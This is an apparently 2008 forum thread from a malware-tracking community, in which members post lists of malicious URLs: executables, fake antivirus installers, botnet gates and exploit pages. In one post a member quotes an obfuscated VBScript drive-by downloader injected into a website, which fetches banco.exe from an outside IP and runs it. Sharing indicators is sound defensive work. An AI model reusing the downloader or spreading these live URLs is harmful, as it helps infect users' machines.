Malware Domain List

Malware Related => Malicious Domains => Topic started by: lanvin on September 07, 2008, 07:26:41 pm

Title: daily something......
Post by: lanvin on September 07, 2008, 07:26:41 pm
Code: [Select]
http://218.22.180.43:81/445566.exe
http://first-reason.com/data/uhuybfgybff/0000005378.exe
http://dd5.tesekl.info/3.exe
http://www.cu108.com/linkme.exe
http://ruanjian2008.kki.cn/0.exe
http://ruanjian2008.kki.cn/2.exe
http://dd4.tesekl.info/not.exe

20080908...
Title: Re: daily something......
Post by: lanvin on September 08, 2008, 03:06:34 pm
Code: [Select]
http://www.qq-new.cn/shengji.exe
http://wm.xnibi.com/'http://m.c5x8.com/mm.exe
http://www.cu108.com/linkme.exe
http://www.zmjjjyy.cn/new/a2.css
http://down.hs7yue.cn/down/UU.ini
http://down.hs7yue.cn/down/sina.exe/

20080909
Title: Re: daily something......
Post by: lanvin on September 09, 2008, 03:33:27 pm
Code: [Select]
http://l.ljsrx.com/test222.exe
http://down.hs7yue.cn/down/sina.exe
http://www.zmjjjyy.cn/new/a1.css
http://61.164.118.208/new/new1.exe
http://61.164.118.208/new/new2.exe
http://61.164.118.208/new/new3.exe
http://61.164.118.208/new/new4.exe
http://61.164.118.208/new/new5.exe
http://61.164.118.208/new/new6.exe
http://61.164.118.208/new/new7.exe
http://61.164.118.208/new/new8.exe
http://61.164.118.208/new/new9.exe
http://61.164.118.208/new/new10.exe
http://61.164.118.208/new/new11.exe
http://61.164.118.208/new/new12.exe
http://61.164.118.208/new/new13.exe
http://61.164.118.208/new/new14.exe
http://61.164.118.208/new/new15.exe
http://61.164.118.208/new/new16.exe
http://61.164.118.208/new/new17.exe
http://61.164.118.208/new/new18.exe
http://61.164.118.208/new/new19.exe
http://61.164.118.208/new/new20.exe
http://61.164.118.208/new/new21.exe
http://61.164.118.208/new/new22.exe
http://61.164.118.208/new/new23.exe
http://61.164.118.208/new/new24.exe
http://61.164.118.208/new/new25.exe
http://61.164.118.208/new/new26.exe
http://61.164.118.208/new/new27.exe
http://61.164.118.208/new/new28.exe
Title: Re: daily something......
Post by: sowhat-x on September 09, 2008, 04:24:02 pm
Quote
hxxp://av355.110mb.com/gate/gate.php?stat=1
hxxp://magmob.info-com.ru/gate/gate.php
hxxp://www.cybertm.tu1.ru/admin/admin.php
hxxp://www.dmc-dmc.1gb.in/gate/gate.php
hxxp://www.patr0n87.tu2.ru/reports/gate.php
hxxp://www.qsl.net/dl2bcm/
hxxp://www.anti-virus-xp.net/sysscan/132a071e5d1437b80c401c6982d513a0/1/
hxxp://www.anti-virus-xp.net/tools/virusremover.dll
hxxp://www.anti-virus-xp.net/check/132a071e5d1437b80c401c6982d513a0_16
hxxp://82.98.235.15/wupd/
Title: Re: daily something......
Post by: lanvin on September 10, 2008, 02:10:34 pm
Code: [Select]
http://222.179.185.117/1.exe
http://222.179.185.117/2.exe
......
http://222.179.185.117/30.exe
http://newymhf6.cn/3.exe
http://l.ljsrx.com/test222.exe
Title: Re: daily something......
Post by: sowhat-x on September 11, 2008, 01:45:17 am
Quote
hxxp://xpsecuritycenter.com/XPSecurityCenter/latest/Installer.exe
hxxp://scan.antispyware-free-scanner.com
hxxp://files.as-pro-xp-download.com/load/setup_1_2_.exe
hxxp://virusremover2008.com/VRM_Free.exe?a=site&l=pay
hxxp://download.virusremover2008.com/VRM_Free.exe
hxxp://www.av-xp2008.com
hxxp://stat.av-xp2008.com/download/16/AntivirusXP2008Installer.exe

And what a surprize,lol...more crap hosted in the same ip obviously...
Quote
hxxp://antivirusxp-2008.net (EstDomains)
hxxp://stat.antivirusxp-2008.net/download/16/AntivirusXP2008Installer.exe (EstDomains)
Title: Re: daily something......
Post by: lanvin on September 11, 2008, 01:54:59 pm
Code: [Select]
http://user9.78-10.net/list/sk01.exe
http://user9.78-10.net/list/sk02.exe
http://user9.78-10.net/list/sk03.exe
http://user9.78-10.net/list/sk04.exe
http://user9.78-10.net/list/sk05.exe
http://user9.78-10.net/list/sk06.exe
http://user9.78-10.net/list/sk07.exe
http://user9.78-10.net/list/sk08.exe
http://user9.78-10.net/list/sk09.exe
http://user9.78-10.net/list/sk10.exe
http://user9.78-10.net/list/sk11.exe
http://user9.78-10.net/list/sk12.exe
http://user9.78-10.net/list/sk13.exe
http://user9.78-10.net/list/sk14.exe
http://user9.78-10.net/list/sk15.exe
http://user9.78-10.net/list/sk16.exe
http://user9.78-10.net/list/sk17.exe
http://user9.78-10.net/list/sk18.exe
http://user9.78-10.net/list/sk19.exe
http://user9.78-10.net/list/sk20.exe
http://user9.78-10.net/list/sk21.exe
http://user9.78-10.net/list/sk22.exe
http://user9.78-10.net/list/sk23.exe
http://user9.78-10.net/list/sk24.exe
http://user9.78-10.net/list/sk25.exe
http://user9.78-10.net/list/sk26.exe
http://user9.78-10.net/list/sk27.exe
http://user9.78-10.net/list/sk28.exe
http://user9.78-10.net/list/sk29.exe
http://user9.78-10.net/list/sk30.exe
Title: Re: daily something......
Post by: SysAdMini on September 11, 2008, 03:25:09 pm
Read this blog article
http://s3cwatch.wordpress.com/2008/09/11/wwwok2bstr8comindex_13html/ (http://s3cwatch.wordpress.com/2008/09/11/wwwok2bstr8comindex_13html/)

There  is a lot more of such crap.

http://www.google.com/search?q=%22ActiveX+Object+to+play+this+video+file%22+%22HARDCORE+VIDEO+ONLINE%22&site=intl&filter=0 (http://www.google.com/search?q=%22ActiveX+Object+to+play+this+video+file%22+%22HARDCORE+VIDEO+ONLINE%22&site=intl&filter=0)

Example from google links :

Code: [Select]
www.hot9.ru/index.php?p_id=138

links to

Code: [Select]
http://softload2009q.com/download/502/1410/0/
downloads MediaTubeCodec_ver1.1410.0.exe.

VT Result:

http://www.virustotal.com/de/analisis/e040a14bb3b30e35eaf59a141d5e37b6 (http://www.virustotal.com/de/analisis/e040a14bb3b30e35eaf59a141d5e37b6)
Title: Re: daily something......
Post by: lanvin on September 12, 2008, 07:03:23 pm
Code: [Select]
http://www.host1550.com/modulos/gera.jpg
http://loaddds.com/file.exe
http://security-prof.com/2009/download/trial/AV2009Install_77024207.exe
http://m.c5x8.com/mm.exe
Title: Re: daily something......
Post by: sowhat-x on September 13, 2008, 03:10:34 am
Quote
hxxp://www.skigiesing.de/bilder/kashir.exe
hxxp://fotolog.host.sk/foto.php?=
hxxp://on1000000.cn/Get7IT.php
hxxp://ferrychi445677.com/Get7ITU.php -> -> EstDomains
hxxp://bmwx6foreva.ru/loads/engine3.bin
hxxp://my-socks.info/lll.exe -> EstDomains
hxxp://de-my-page.info/img/scan_trCRY.exe -> EstDomains
hxxp://79.132.211.50/alex/1.exe
hxxp://58.65.235.41/ndl/index.php -> control panel,pretty lame ;-)
hxxp://58.65.235.41/ndl/controller.php?action=bot&entity_list=&rnd=982142
hxxp://monsterlink.org/spl/exe.php
hxxp://www.0xfffffffff.net/spl/index.php
hxxp://165.194.30.123/qwerty/traf.php
hxxp://rivatos.net/tds/in.cgi?default -> EstDomains
hxxp://rivatos.net/in.cgi?idb1
hxxp://rivatos.net/tds/in.cgi?3
hxxp://rivatos.net/tds/in.cgi?2
hxxp://myfrooogle.cn/z/index.php
hxxp://onlinececk.com/ -> pdf exploits also in the past there as well / EstDomains
hxxp://www.anti-virus-xp.net/sysscan/132a071e5d1437b80c401c6982d513a0/1/
hxxp://www.anti-virus-xp.net/check/132a071e5d1437b80c401c6982d513a0_16
hxxp://www.anti-virus-xp.net/tools/virusremover.dll
hxxp://guidetosuccess.name/images/index.php -> EstDomains
hxxp://guidetosuccess.name/images/ff.jar
hxxp://guidetosuccess.name/images/ff2.jar
hxxp://guidetosuccess.name/images/lv.jar
hxxp://guidetosuccess.name/images/ff4.jar
hxxp://guidetosuccess.name/images/ff3.jar
hxxp://guidetosuccess.name/images/ff5.jar
hxxp://guidetosuccess.name/images/ff7.jar
hxxp://guidetosuccess.name/images/ff12.jar
hxxp://guidetosuccess.name/images/ff6.jar
hxxp://guidetosuccess.name/images/ff8.jar
hxxp://guidetosuccess.name/images/ff9.jar
hxxp://guidetosuccess.name/images/ff13.jar
hxxp://guidetosuccess.name/images/ff14.jar
hxxp://guidetosuccess.name/images/ff10.jar
hxxp://guidetosuccess.name/images/ff15.jar
hxxp://guidetosuccess.name/images/ff11.jar
hxxp://guidetosuccess.name/images/loade.php
Title: Re: daily something......
Post by: lanvin on September 13, 2008, 10:09:30 am
Code: [Select]
http://www.qq-songli.cn/001.exe
http://www.qq-songli.cn/002.exe
http://www.qq-songli.cn/003.exe
http://www.qq-songli.cn/004.exe
http://www.qq-songli.cn/005.exe
http://www.qq-songli.cn/006.exe
http://www.qq-songli.cn/007.exe
http://www.qq-songli.cn/008.exe
http://w.stopcao.cn/good/x.exe
http://www.zmjjjyy.cn/down/ko.exe
http://down.hs7yue.cn/down/ko.css
Title: Re: daily something......
Post by: lanvin on September 14, 2008, 09:54:25 am
Code: [Select]
Site Domain :     0catch.com
Site Location:     United States of America
Threat Links on this site(part of them):

http://wrkshp14.0catch.com/kettlebells-uk.html 
http://jyg7321.0catch.com/ 
http://wrkshp5.0catch.com/scorpio-tattoo.html 
http://keaydi.0catch.com/ 
http://wrkshp14.0catch.com/hoist-dumbbells.html 
http://wrkshp15.0catch.com/campbells-chicken-noodle-soup.html 
http://wrkshp14.0catch.com/custom-doorbells.html 
http://wrkshp14.0catch.com/crazy-fogs-jingle-bells-mp3.html 
http://wrkshp14.0catch.com/deagan-bells.html 
http://pedomederpel.0catch.com/


Site Domain :     218.22.180.43
Site Location:     China
Threat Links on this site(part of them):

http://218.22.180.43:81/vmdetdhc.htm 
http://218.22.180.43/TuTu01.exe 
http://218.22.180.43/w.exe 
http://218.22.180.43/w.exe 
http://218.22.180.43:81/445566.exe 






Title: Re: daily something......
Post by: CM_MWR on September 14, 2008, 10:57:37 am
Thanks Lanvin,I somehow missed this topic but much appreciate the links.  :P

Code: [Select]
http://lovelypornovideo.net/load.php?aff=&/HDVideoCodec_ver1..0.exe
http://pornotube30.net/getsoft/79_003.exe
http://usuarios.lycos.es/libredll/udp.nnn
http://ranchsource.com/files/778r.jpg
http://ranchsource.com/files/777.jpg
http://files657284.net/b2b/dmlatc.cgi
http://files657284.net/b2b/load/nlatdm.exe
http://files657284.net/b2b/load/vmairn.exe
http://files657284.net/b2b/load/djdnxl.exe
http://www.moduloscriticos.com.br/mod/configdw.txt
http://www.moduloscriticos.com.br/mod/imlog.jpg
http://www.moduloscriticos.com.br/mod/imbdj.jpg
http://www.moduloscriticos.com.br/mod/implug.jpg
http://www.moduloscriticos.com.br/mod/immsn.jpg
http://www.moduloscriticos.com.br/mod/imok.jpg
http://www.moduloscriticos.com.br/mod/config.jpg
http://www.moduloscriticos.com.br/mod/mslink.jpg
http://75.125.233.171/julho/imlog.jpg
http://www.marajo03.kit.net/imbdj.jpg
http://75.125.233.171/julho/implug.jpg
http://www.marajo00.kit.net/imok.jpg
http://avzhan.3322.org:81/1.exe
http://78.157.143.251/bho/msfont.dll
http://m.c5x8.com/mm.exe
http://www.sognilucidi.it/forum/download/.http/~/foto1.jpg
http://goldbye.vicp.net/svchost1.exe
http://goldbye.vicp.net/Cyber02Hide.exe
http://omega-sts.ru/usr/templates/CVS/.dc/visualizador
http://globalcenter.home.sapo.pt/1.gif
http://globalcenter.home.sapo.pt/2.gif
http://globalcenter.home.sapo.pt/3.gif
http://transito2009.web26.f3.k8.com.br/msmask32.jpg
http://transito2009.web26.f3.k8.com.br/ossmtp.jpg
http://transito2009.web26.f3.k8.com.br/estrela.jpg
http://transito2009.web26.f3.k8.com.br/file_new.jpg
http://www.florenca2009.com/config/config.dll
Title: Re: daily something......
Post by: lanvin on September 14, 2008, 03:37:00 pm
Code: [Select]
[quote author=CM_MWR link=topic=2207.msg5599#msg5599 date=1221389857]
Thanks Lanvin,I somehow missed this topic but much appreciate the links.  :P

m/config/config.dll


dig  from your post:)

Code: [Select]
http://75.125.233.171/mod/modplug14.jpg
http://m.c5x8.com/flashmm.exe 
http://m.d5x8.com/dd/9.exe
http://m.c5x8.com/dd/3.exe
http://2.trojan8.com/dd/10.exe
http://m.c5x8.com/dd/2.exe
http://m.c5x8.com/dd/1.exe
Title: Re: daily something......
Post by: SysAdMini on September 14, 2008, 05:45:49 pm
Code: [Select]
http://reda-vision.com/config.exe
http://www.virustotal.com/analisis/a10b9cdb94e166d12caed1093db639ac (http://www.virustotal.com/analisis/a10b9cdb94e166d12caed1093db639ac)

More info about it here

http://www.cs.ucsb.edu/~marco/blog/2008/09/backdoored-php-shells.html (http://www.cs.ucsb.edu/~marco/blog/2008/09/backdoored-php-shells.html)
Title: Re: daily something......
Post by: JohnC on September 14, 2008, 09:24:40 pm
Thank you.
Title: Re: daily something......
Post by: sowhat-x on September 15, 2008, 12:04:25 am
Quote
hxxp://193.33.61.169/cntr.gif
hxxp://91.203.92.25/hvha/4683lt.exe
hxxp://ksn.a1001186.wrs.flutix.com/meane.stf
hxxp://lolika.cn/docs/us.txt
hxxp://lolika.cn/docs/us2.txt
hxxp://lolika.cn/docs/us3.txt
hxxp://www.mediacodec.co.cc/justplayit.exe

Pinches here...
Quote
hxxp://ks4sk.fatal.ru/1/1.php
hxxp://mechta2.freehostia.com    -> Open dir,check for logs and other stuff there...
hxxp://skkeyg.freehostia.com      -> Open dir,check for logs and other stuff there...

Hunting for Pinches really pays back sometimes...
Quote
hxxp://c.bestnews.cc/e/buf.png -> Result: 0/36 (0%)
http://www.virustotal.com/analisis/54a9ba01bdd03fce710d9cceafb0d2e4

hxxp://c.bestnews.cc/e/mov.qt -> Result: 2/36 (5.56%)
http://www.virustotal.com/analisis/5ac531f64205150158da7b6d6153e8ea

hxxp://c.bestnews.cc/file.php?o=7&q=2&w=fire -> Result: 13/36 (36.12%)
http://www.virustotal.com/analisis/bad64f314a091e12a1957a252cd3f5c0

Also digged a webshell from there...
Quote
hxxp://bestnews.cc/tools.rar

All stuff from bestnews.cc added in attachment,note that it's NOT password-protected...
Title: Re: daily something......
Post by: lanvin on September 15, 2008, 04:24:28 am
Code: [Select]
http://91.203.92.25/hvha626/s6c4n6s.exe
http://91.203.92.25/hvha123/ex32de.exe
http://ksn.a.wrs.mcboo.com/17PHolmes.cmt
http://ksn.a.wrs.flutix.com/meane.stf
http://lolika.cn/docs/tips.txt (MZ)

dig.......:)
Title: Re: daily something......
Post by: lanvin on September 15, 2008, 02:06:34 pm
Code: [Select]
http://2.trojan8.com/dd/1.exe
http://2.trojan8.com/dd/2.exe
http://2.trojan8.com/dd/6.exe
http://2.trojan8.com/dd/9.exe
Title: Re: daily something......
Post by: lanvin on September 16, 2008, 11:31:15 am
Code: [Select]
zango.com 
http://downloads.zango.com/zangogames/chamber/setupchamber2848.exe
http://downloads.zango.com/zangogames/dvg/setupdavid2365.exe
http://downloads.zango.com/zangogames/zangotv/setupzangotv2593.exe
http://downloads.zango.com/zangogames/library/setuplibrary2797.exe
http://ftp.surfnet.nl/simtel/win95/secsys/passpectpro32.exe

180solutions.com 
http://bis.180solutions.com/downloads/msbb.exe


hotbar.com 
http://installs.hotbar.com/installs/hotbar/programs/hotbar.exe
http://www.hbdownloads.com/installs/hotbar/programs/hotbarinst.exe
http://installs.hotbar.com/installs/hbtools/programs/hbtools.exe
http://installs.hotbar.com/installs/hbtools/programs/hbtools.cab
http://installs2.hotbar.com/installs/hotbar/programs/hotbar.exe


zangocash.com
http://static.zangocash.com/Setup/53/Zango/Setup.exe 
http://static.zangocash.com/Setup/53/Seekmo/Setup.exe 



please dig
Code: [Select]
gophergas.com
albinoblacksheep.com 
simtel.net 
Title: Re: daily something......
Post by: SysAdMini on September 16, 2008, 11:42:33 am
Code: [Select]
www.ulitka.de
has code

Code: [Select]
<SCRIPT language=VBScript>
    on error resume next

    dl = "http://210.202.194.167/banco.exe"

    Set df = document.createElement("object")

    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

    str="Microsoft.XMLHTTP"

    Set x = df.CreateObject(str,"")

    a1="Ado"

    a2="db."

    a3="Str"

    a4="eam"

    str1=a1&a2&a3&a4

    str5=str1

    set S = df.createobject(str5,"")

    S.type = 1

    str6="GET"

    x.Open str6, dl, False

    x.Send

    fname1="http://www.ulitka.de/index2.html"

    set F = df.createobject("Scripting.FileSystemObject","")

    set tmp = F.GetSpecialFolder(2) ' Get tmp folder

    fname1= F.BuildPath(tmp,fname1)

    S.open

    S.write x.responseBody

    S.savetofile fname1,2

    S.close

    set Q = df.createobject("Shell.Application","")

    Q.ShellExecute fname1,"","","open",0

    </SCRIPT>


to download

Code: [Select]
http://210.202.194.167/banco.exe
Title: Re: daily something......
Post by: JohnC on September 16, 2008, 06:59:05 pm
Thanks.
Title: Re: daily something......
Post by: lanvin on September 17, 2008, 06:43:20 am
Code: [Select]
prtectionactivescan.com

http://softwaredesign6.com/2009/download/trial/A9loader_770522160214.exe
http://prtectionactivescan.com/2009/download/trial/A9loader_770522164720.exe
http://prtectionactivescan.com/2009/download/trial/A9loader_77052201.exe
http://prtectionactivescan.com/2009/download/trial/A9loader_770522164437.exe

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.freewebs.com/chipxinh503/GirlKuTe.exe

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.cao-2.cn/Real10.js
http://www.cao-1.cn/Real10.js
http://202.106.195.23:6688/aicss_test241.css (invalid)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

as-pro-xp-download.com

http://files.as-pro-xp-download.com/load/setup_100525_3_.exe 
http://files.as-pro-xp-download.com/load/setup_110084_3_.exe 
http://files.as-pro-xp-download.com/load/setup_110102_3_.exe 
http://files.as-pro-xp-download.com/load/setup_100525_6_.exe 
http://files.as-pro-xp-download.com/load/setup_110151_3_.exe

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




Title: Re: daily something......
Post by: lanvin on September 18, 2008, 11:15:12 am
Code: [Select]
91.121.138.222

http://91.121.138.222/~warman24/Setup_ver1.1706.0.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
allinonespy.com

http://www.allinonespy.com/all-in-one-spy.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.ppexe.com/

http://www.ppexe.com/comine/2.exe 
http://www.ppexe.com/comine/mfrj.exe 
http://www.ppexe.com/comine/dwbins.exe   
http://www.ppexe.com/comine/wowoaa.exe 
http://www.ppexe.com/comine/mf.exe 
http://www.ppexe.com/comine/ffxi369.exe 
http://www.ppexe.com/new/1.exe 
http://www.ppexe.com/comine/mf.exe
http://www.ppexe.com/comine/db820.exe
Title: Re: daily something......
Post by: lanvin on September 19, 2008, 08:17:21 am
Code: [Select]
blazingtools.com

http://www.blazingtools.com/downloads/i_bpk2003.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
swmirror.com

http://dreamingsoft.swmirror.com/fcsetup.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
blazingtools.com

http://www.blazingtools.com/downloads/i_bpk2003.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
facaizhifuok.cn

http://facaizhifuok.cn/hb/1.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Title: Re: daily something......
Post by: CM_MWR on September 19, 2008, 09:46:23 am
Thanks Lanvin,

Some fun to play with

hxxp://rtrbenews.com/svchost.exe
hxxp://rtrbenews.com/svchost2.exe
hxxp://rtrbenews.com/svchost3.exe
hxxp://ontilop.net/_stub.exe
hxxp://wirexgold.com/explorer.exe
hxxp://rondolook.net/_stub.exe
hxxp://rondolook.net/123.exe
hxxp://wapbrazil.nexenservices.com/image/Gbsvs.exe
hxxp://79.135.167.18/sl32.exe
hxxp://79.135.167.18/scan4.exe
hxxp://79.135.167.18/cgi-bin/index.cgi?test2
hxxp://79.135.167.18/gpls32.exe1
hxxp://www.blogouf.com/images/closeframe.gif
hxxp://www.blogouf.com/images/logo-blogoufbig.gif
hxxp://wapbrazil.nexenservices.com/image/sys_Java.exe
hxxp://66.90.104.196/Autoupdate/Setup_ver1.1494.0.exe
hxxp://loaddds.com/file.exe
hxxp://sexoon.ifrance.com/link.jpg
hxxp://78.157.143.251/bho/msfont.dll
hxxp://www.gondolatriveneto.com/img/categorie/9_mai_big.jpg
hxxp://www.modulog2008.hpgvip.com.br/themida.jpg
hxxp://www.modulog2008.hpgvip.com.br/dynamic.jpg
hxxp://www.host1550.com/modulos/modulo.jpg
hxxp://www.host1550.com/modulos/gera.jpg
hxxp://www.host1550.com/modulos/plugin.jpg
hxxp://www.host1550.com/modulos/net.jpg
hxxp://www.host1550.com/modulos/msn.jpg
hxxp://www.host1550.com/modulos/orkut.jpg
hxxp://lovelypornovideo.net/load.php?aff=&/HDVideoCodec_ver1..0.exe
hxxp://pornotube30.net/getsoft/79_003.exe
hxxp://lidahua.3322.org/gz.exe
hxxp://lidahua.3322.org/jzllw.exe
hxxp://lidahua.3322.org/doudou.exe
hxxp://lidahua.3322.org/Down1.exe
hxxp://lidahua.3322.org/waigua.exe
hxxp://sortesorte009.mail333.su/familia.gif
hxxp://www.death-note.biz/up/img/22752.exe
hxxp://satellife.info/?&v=2608kj&lid=1033
hxxp://v2count.net/cc/ccdo.php?affid=5
hxxp://v2count.net/cc/srtytrewqertytrew.php?affid=5&code1=HOPH&code2=1257
hxxp://v2count.net/out/search.jpg
hxxp://v2count.net/out/winlogon.jpg
hxxp://v2count.net/out/tibs.jpg
hxxp://v2count.net/out/tool.jpg
hxxp://v2count.net/out/proxy.jpg
hxxp://russia-vs-georgia.org/admin/load.php?id=500357855
hxxp://freee.lviv.name/antivir/scan.exe
hxxp://freee.lviv.name/antivir/serv.exe
hxxp://freee.lviv.name/antivir/Setup_ver1.1254.0.exe
hxxp://freee.lviv.name/antivir/silent.exe
hxxp://www.ltb.com.co/portal/modules/pagesetter/doc/default/irs_efill.php

---------------------

208.66.194.232/40E8000842CFEBBCE21EFAC86C0000006866000000007600000147EB0005306A70777F
78.157.142.26/files/42/v2test7/file.exe
85.255.118.29/ppc/config.php?v=19&u=3259&acln=en-us&s=hxxp://www.google.com/&sch=n
85.255.118.29/ppc/config.phpchk
91.203.92.25/hvha626/s6c4n6s.exe
a486.g.akamai.net/wzcline23.exe
anti-virus-xp.net/images/1221042566/59d422a3203c189a5a485ed62282d44d/f13b3635-68ca-4d6d-95e4-3fe0ff04661f.gif
anti-virus-xp.net/images/1221042578/59d422a3203c189a5a485ed62282d44d/f13b3635-68ca-4d6d-95e4-3fe0ff04661f.ok?id=16
anti-virus-xp.net/images/1221043179/59d422a3203c189a5a485ed62282d44d/f13b3635-68ca-4d6d-95e4-3fe0ff04661f.gif
googlescanners-360.com/2009/100/freescan.php?aid=880724
googlescanners-360.com/2009/download/trial/AV2009Install_880724.exe
total-secure2009.com/download.php
totalsecuredownload.com/TotalSecure2009.exe
xww.panel911.com/traffic/in.cgi?google1
xww.panel911.com/traffic/in.cgi?hunter
zonephp.com/del/us.exe
zonephp.com/del/us.php?1=duhme_0008dc42&i=
zonephp.com/del/us.php?2=duhme_0008dc42&n=0&v=16778773&i=&s=0&sp=0&lcp=0&pr=0
zonephp.com/del/us.php?2=duhme_0008dc42&n=1&v=16778773&i=&s=0&sp=0&lcp=0&pr=0
zonephp.com/del/userror
zonephp.com/ld.php?v=1&id=27718&rs=2087256932&cc=0
zonephp.com/ld.php?v=1&rs=2087256932
Title: Re: daily something......
Post by: lanvin on September 19, 2008, 03:15:57 pm
Thanks Lanvin,

Some fun to play with

~~~~~
Hi  CM_MWR,
Thank you very much  :)
Title: Re: daily something......
Post by: sowhat-x on September 19, 2008, 03:17:29 pm
Quote
hxxp://mr-z.ru/logs2/BlackWM222.exe

Quote
hxxp://0smp.ru/gpack/admin.php
hxxp://finito.fi.funpic.org/black/auth.php

Quote
hxxp://forsakens.freehostia.com/gate/
hxxp://pinch.freehostia.com/
hxxp://test.bboys.tu2.ru/gate.php
hxxp://www.tihvin.tu2.ru/italy/gate.php
Title: Re: daily something......
Post by: sowhat-x on September 19, 2008, 03:21:52 pm
And a special one as well,lol...that also earned Google's malware prevention warning,he-he...
http://www.google.com/search?hl=en&q=dlockley.com
Quote
hxxp://dlockley.com/
Title: Re: daily something......
Post by: lanvin on September 20, 2008, 07:55:20 am
Code: [Select]
http://mdrop.md.funpic.org/habbo%20tools/flooder/macrotool.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://hipapatam.com/Client20.1531.0.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://dl-updates.freehostia.com/vc.txt    (pe)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.bopings.com/a.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.kasdbrs.com/ld_vp002.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Title: Re: daily something......
Post by: lanvin on September 21, 2008, 09:46:39 am
Code: [Select]
http://www.6rb-ksa.com/vip.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://tudoforum.webcindario.com/verdinho.jpg   PE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.pointcashbag.com/cashback/download/install.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://avzhan.3322.org:81/1.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://lyon2008.sitesled.com/image09776554foto01.exe
http://blackman717.sitesled.com/instal-tv-sexe-24h.exe
http://gaming3d.sitesled.com/DragonBot_3_FullSetup.exe
http://gaming3d.sitesled.com/sexbot_fullsetup.exe
http://gaming3d.sitesled.com/gzn_setup.exe
http://voce.sitesled.com/veja.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://786ts.qqsafe-qqservicesyydswfhuw8ysjftwf.org/dl.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Title: Re: daily something......
Post by: lanvin on September 22, 2008, 07:18:31 am
Code: [Select]
http://dd6.tesekl.info/net.exe
http://danielblaskieviz.xpg.com.br/upload/imglog.jpg
http://download.sav2008.com/dload.php?actually=1&advid=5251
http://www.rotarymilanosudest.com/site_access/bollettini/2007-2008/agosto.exe
http://knut.kumoh.ac.kr/~kopress/board//skin/f2plus_gallery_2_0/.tmp/FrWall2.exe
http://www.1ive.net/count/Install.asp
http://cel33264578.xpg.com.br/imglog.xml
http://www.sabaozinhox.net/Source.exe
http://www.aera.gr/files/.slide/win32.exe
http://www.oflogao.com/tim/download/picture.exe
http://vivoonline.hpg.com.br/nosso.jpg
Title: Re: daily something......
Post by: SysAdMini on September 22, 2008, 02:36:45 pm
Another Fake Antivirus.

Code: [Select]
hxxp://your-windows-scanner.com/soft/r/AV2008install.exe

Virustotal

http://www.virustotal.com/analisis/9c6df880a6b4dee045da0543cb91bbed


Code: [Select]
hxxp://scanner.microantivirus2009.com/setup/install_511_MHwzNnwwfHx8fHx8fHw_.exe
VirusTotal

http://www.virustotal.com/analisis/6aee6527bd9aa13231eb0d831a0569d0

Title: Re: daily something......
Post by: sowhat-x on September 24, 2008, 03:51:15 am
Spam related (DirectMailer) open dirs...
Google gives warning in quite a few of them,
so I assume that other 'goodies' might exist there as well,
but I haven't personally bothered checking in such detail...

Quote
hxxp://a1sfingerprinting.com
hxxp://adept-consult.com.au
hxxp://adgjm.us
hxxp://altai-himalaya.com
hxxp://antique-buddha-statues.com
hxxp://autechtrade.com
hxxp://busratings.com
hxxp://c-a-k-e.co.za
hxxp://crossroadsgroup.com.au
hxxp://epochengineering.net
hxxp://eurozsia.com.au/log/misc/
hxxp://gordonclub-bg.info
hxxp://gracetrailer.com
hxxp://jenesisarts.com
hxxp://kingstaracamp.com
hxxp://milward.biz
hxxp://onlinemetalart.com
hxxp://pci-controlobjectives.org
hxxp://printers-ftp-server.org
hxxp://tenthousandbuddhastudios.com
hxxp://trainingvitals.com.au
hxxp://tsunamidragteam.com
hxxp://vavilondv.com
hxxp://www.802-11wireless.net
hxxp://www.archangelgames.com
hxxp://www.assortedcream.net
hxxp://www.australianwaterlife.com.au
hxxp://www.crossroadsgroup.com.au
hxxp://www.dandtcorp.com.au
hxxp://www.giproductions.com.au
hxxp://www.heliodesign.com
hxxp://www.jsgray.com
hxxp://www.littlespider.com.au
hxxp://www.olmax.net
hxxp://www.sirbeavis.com
hxxp://www.withintemptation.com.au
Title: Re: daily something......
Post by: sowhat-x on September 24, 2008, 05:02:24 am
Quote
hxxp://www.circadian.net/ayelet/
hxxp://www.casino-news.biz/
hxxp://unlimitedinspections.com/
hxxp://reddii.ru/traffic/sploit1/?

Quote
hxxp://meopta.ru/haitou.php
hxxp://meopta.ru/coi.html
hxxp://meopta.ru/coiu.html
hxxp://bestshaste.cn/good.html?

haitou.php is certainly a pain in the ass to decode it,scripts attached below...
Title: Re: daily something......
Post by: sowhat-x on September 24, 2008, 05:45:50 am
...out of curiosity,I scanned the 'haitou-scripts-only.php" in VirusTotal:
